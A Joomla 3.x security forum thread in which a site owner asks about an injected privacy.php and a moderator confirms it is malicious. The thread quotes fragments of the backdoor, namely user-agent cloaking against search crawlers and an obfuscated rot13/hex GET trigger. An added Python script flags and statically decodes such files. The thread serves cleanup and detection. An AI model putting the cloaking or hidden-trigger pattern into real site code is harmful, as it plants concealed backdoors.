Do I need privacy.php and is it infected?

Discussion regarding Joomla! 3.x security issues.

Post by scifivision » Wed Sep 18, 2019 2:34 am

Is there supposed to be a privacy.php file inside the main Joomla directory? I think this may be part of an injected virus. Tech support for the server sent me some flagged questionable files. And if it's infected, before you say you need to reinstall the whole site etc. and update all the plugins, yes I know and am going to do just that, but I am trying to first understand if it's infected, exactly what it means so I can recognize this in the future. I noticed my other Joomla installs didn't have the file.

Some of the code to me looks legit, but I don't know a lot about the code. This is the part I didn't know about:

Code:

<?php
// Preventing a directory listing
if(!empty($_SERVER["HTTP_USER_AGENT"])) {

I don't know what it does, so I didn't want to just delete the whole file. This code however, I'm pretty sure is bad, because you have to scroll far over to see it:

Code:

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
        header("HTTP/1.0 404 Not Found");exit;
    }
}

and

Code:

if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;$_X="

and then a huge string of numbers.

If it is infected I am going to reinstall Joomla and the plugins, but I want to make sure I have a backup in case I screw something up, and although it might be vulnerable still, I don't want to save an infected backup either. I'm running Joomla 3.9.10

Post by toivo » Wed Sep 18, 2019 3:47 am

Surely infected. The only PHP files in the main Joomla directory are index.php and configuration.php. Any other PHP file there, other than the FPA script, in case it was left behind by mistake, is assumed to be malicious, like your file privacy.php, containing str_rot13 and pack statements to obfuscate the code and hide the real purpose of the script.

It is recommended to post the results of the Forum Post Assistant (FPA) by following the instructions from https://forumpostassistant.github.io/docs/ so that you would have a chance to receive advice from experts about the configuration of the web server and the site, including the third party extensions, some of which may be obsolete or reported in the Joomla! Vulnerable Extensions List (VEL) at https://vel.joomla.org/.
Toivo Talikka, Global Moderator
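
A defender-side triage of the rule in the reply above, as an added example that is not part of the thread: it lists PHP files in a Joomla root other than index.php and configuration.php (a leftover FPA script would be listed too), flags the traits quoted in the first post, and decodes str_rot13(pack("H*", ...)) literals statically, without executing the file. The marker names, function names and the temporary sample directory are assumptions made for this example.

```python
import codecs
import re
import tempfile
from pathlib import Path

# Per the reply above: only these PHP files belong in the Joomla root.
EXPECTED_ROOT_PHP = {"index.php", "configuration.php"}
# Traits quoted in the thread; the marker names are labels invented for this example.
MARKERS = {
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "pack-hex": re.compile(r"""\bpack\s*\(\s*["']H\*["']"""),
    "crawler-cloaking": re.compile(r"HTTP_USER_AGENT.{0,400}?404 Not Found", re.S),
}
ROT13_HEX = re.compile(r"""str_rot13\s*\(\s*pack\s*\(\s*["']H\*["']\s*,\s*["']((?:[0-9a-fA-F]{2})+)["']""")

def decode_rot13_hex(source):
    """Statically decode str_rot13(pack("H*", "<hex>")) literals; no PHP is executed."""
    return [codecs.decode(bytes.fromhex(h).decode("latin-1"), "rot_13")
            for h in ROT13_HEX.findall(source)]

def triage_root(root):
    """Map each unexpected *.php file in the Joomla root to its markers and decoded names."""
    report = {}
    for path in sorted(Path(root).glob("*.php")):
        if path.name in EXPECTED_ROOT_PHP:
            continue
        text = path.read_text(errors="replace")
        hits = [name for name, rx in MARKERS.items() if rx.search(text)]
        report[path.name] = {"markers": hits, "decoded": decode_rot13_hex(text)}
    return report

# Constructed sample: only the fragments quoted in the first post; the payload is elided.
SAMPLE = '''<?php
if(!empty($_SERVER["HTTP_USER_AGENT"])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
        header("HTTP/1.0 404 Not Found");exit;
    }
}
if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) { /* payload elided */ }
'''

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("index.php", "configuration.php", "info.php"):
            Path(tmp, name).write_text("<?php\n")
        Path(tmp, "privacy.php").write_text(SAMPLE)
        return triage_root(tmp)

if __name__ == "__main__": print(demo())
```

A decoded parameter name can then be searched for in the web server's access logs to see whether the file was ever requested with it.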

Post by scifivision » Wed Sep 18, 2019 4:24 am

Thanks, I’ll figure out how to do that. I guess info.php (essentially empty) and mysql-[removed].php should be deleted too; those oddly weren’t flagged.

Post by toivo » Wed Sep 18, 2019 4:51 am

You are right, those two files must have been uploaded just to make it look legitimate and confuse the webmaster and support staff.
Toivo Talikka, Global Moderator

Post by scifivision » Wed Sep 18, 2019 5:32 am

Thank you. I’m going to have them scan everything, back it up just in case and then make a new install and connect the old database etc.

Question, though: I’ve read everywhere you should reinstall no matter what. If the virus scanner says it is clean, I take it that’s not enough? Or can you just update all the plugins? It’s just a pain if unnecessary.

Post by toivo » Wed Sep 18, 2019 6:21 am

Unfortunately normal virus scanners do not detect every malicious script. You should try Phil Taylor's Joomla full audit service at https://myjoomla.guru/ (no affiliation), where the first software audit is free.

Follow the advice and best practice, documented in the sticky topics of the 3.x Security forum.
Toivo Talikka, Global Moderator

